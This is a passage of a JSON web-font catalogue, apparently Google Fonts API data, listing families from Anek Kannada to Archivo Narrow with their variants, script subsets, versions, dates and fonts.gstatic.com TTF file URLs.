\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dFDEQukVReA1oef.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dFxEQukVReA1oef.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dGdFgukVReA1oef.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dGkFgukVReA1oef.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dHDFgukVReA1oef.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Latin\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuR7EZKdClWL3kgw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3Pux7AZKdClWL3kgw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuGbAZKdClWL3kgw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuR7AZKdClWL3kgw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PudbAZKdClWL3kgw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PumbcZKdClWL3kgw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuoLcZKdClWL3kgw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3Pux7cZKdClWL3kgw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Malayalam\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"malayalam\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUZu_HMr5PDO71Qs.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTURu-HMr5PDO71Qs.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUcW-HMr5PDO71Qs.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUZu-HMr5PDO71Qs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUam-HMr5PDO71Qs.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUUW5HMr5PDO71Qs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUXy5HMr5PDO71Qs.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTURu5HMr5PDO71Qs.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Odia\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"oriya\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnmZf63mXZAtm_es.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnkZfq3mXZAtm_es.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnnHfq3mXZAtm_es.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnmZfq3mXZAtm_es.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnmrfq3mXZAtm_es.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnlHea3mXZAtm_es.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnl-ea3mXZAtm_es.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnkZea3mXZAtm_es.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Tamil\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNQiZ6q4v4oegjOQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNwid6q4v4oegjOQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNHCd6q4v4oegjOQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNQid6q4v4oegjOQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNcCd6q4v4oegjOQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNnCB6q4v4oegjOQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNpSB6q4v4oegjOQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNwiB6q4v4oegjOQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Telugu\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13y-_oE2G2ep10_8.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i136--oE2G2ep10_8.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i133G-oE2G2ep10_8.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13y--oE2G2ep10_8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13x2-oE2G2ep10_8.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13_G5oE2G2ep10_8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i138i5oE2G2ep10_8.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i136-5oE2G2ep10_8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Angkor\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/angkor/v28/H4cmBXyAlsPdnlb-8iw-4Lqggw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Annie Use Your Telescope\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/annieuseyourtelescope/v18/daaLSS4tI2qYYl3Jq9s_Hu74xwktnlKxH6osGVGjlDfB3UUVZA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anonymous Pro\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/anonymouspro/v21/rP2Bp2a15UIB7Un-bOeISG3pLlw89CH98Ko.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/anonymouspro/v21/rP2fp2a15UIB7Un-bOeISG3pHl428AP44Kqr2Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anonymouspro/v21/rP2cp2a15UIB7Un-bOeISG3pFuAT0CnW7KOywKo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/anonymouspro/v21/rP2ap2a15UIB7Un-bOeISG3pHl4OTCzc6IG30KqB9Q.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Antic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/antic/v19/TuGfUVB8XY5DRaZLodgzydtk.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Antic Didone\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/anticdidone/v16/RWmPoKKX6u8sp8fIWdnDKqDiqYsGBGBzCw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Antic Slab\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/anticslab/v16/bWt97fPFfRzkCa9Jlp6IWcJWXW5p5Qo.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anton\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/anton/v23/1Ptgg87LROyAm0K08i4gS7lu.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Antonio\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVxx8BtIY2DwSXlM.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVzx8RtIY2DwSXlM.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVwv8RtIY2DwSXlM.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVxx8RtIY2DwSXlM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVxD8RtIY2DwSXlM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVyv9htIY2DwSXlM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVyW9htIY2DwSXlM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anybody\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4J12HPrsXD_nBPpQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JV2DPrsXD_nBPpQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JiWDPrsXD_nBPpQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4J12DPrsXD_nBPpQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4J5WDPrsXD_nBPpQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JCWfPrsXD_nBPpQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JMGfPrsXD_nBPpQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JV2fPrsXD_nBPpQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JfmfPrsXD_nBPpQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyMn7M_H3HVfpcHY.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyOn7c_H3HVfpcHY.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyN57c_H3HVfpcHY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyMn7c_H3HVfpcHY.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyMV7c_H3HVfpcHY.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyP56s_H3HVfpcHY.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyPA6s_H3HVfpcHY.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyOn6s_H3HVfpcHY.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyOO6s_H3HVfpcHY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arapey\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arapey/v16/-W__XJn-UDDA2RC6Z9AcZkIzeg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/arapey/v16/-W_9XJn-UDDA2RCKZdoYREcjeo0k.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arbutus\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arbutus/v24/NaPYcZ7dG_5J3poob9JtryO8fMU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Arbutus Slab\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/arbutusslab/v16/oY1Z8e7OuLXkJGbXtr5ba7ZVa68dJlaFAQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Architects Daughter\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/architectsdaughter/v18/KtkxAKiDZI_td1Lkx62xHZHDtgO_Y-bvfY5q4szgE-Q.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Archivo\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTNDJp8B1oJ0vyVQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTtDNp8B1oJ0vyVQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTajNp8B1oJ0vyVQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTNDNp8B1oJ0vyVQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTBjNp8B1oJ0vyVQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTT6jRp8B1oJ0vyVQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTT0zRp8B1oJ0vyVQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTtDRp8B1oJ0vyVQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTnTRp8B1oJ0vyVQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HCBshdsBU7iVdxQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HABsxdsBU7iVdxQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HDfsxdsBU7iVdxQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HCBsxdsBU7iVdxQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HCzsxdsBU7iVdxQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HBftBdsBU7iVdxQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HBmtBdsBU7iVdxQ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HABtBdsBU7iVdxQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HAotBdsBU7iVdxQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Archivo Black\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/archivoblack/v17/HTxqL289NzCGg4MzN6KJ7eW6OYuP_x7yx3A.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Archivo Narrow\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFGKpHOtFCQ76Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvHlGKpHOtFCQ76Q.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhv8laKpHOtFCQ76Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvy1aKpHOtFCQ76Q.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BJi53mpNiEr6T6Y.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/archivonarrow/v28/tss7ApVBdCYD5Q7hcxTE1ArZ0bb1k3JSLwe1hB965BJQ53mpNiEr6T6Y.ttf\",\n        \"600italic\": 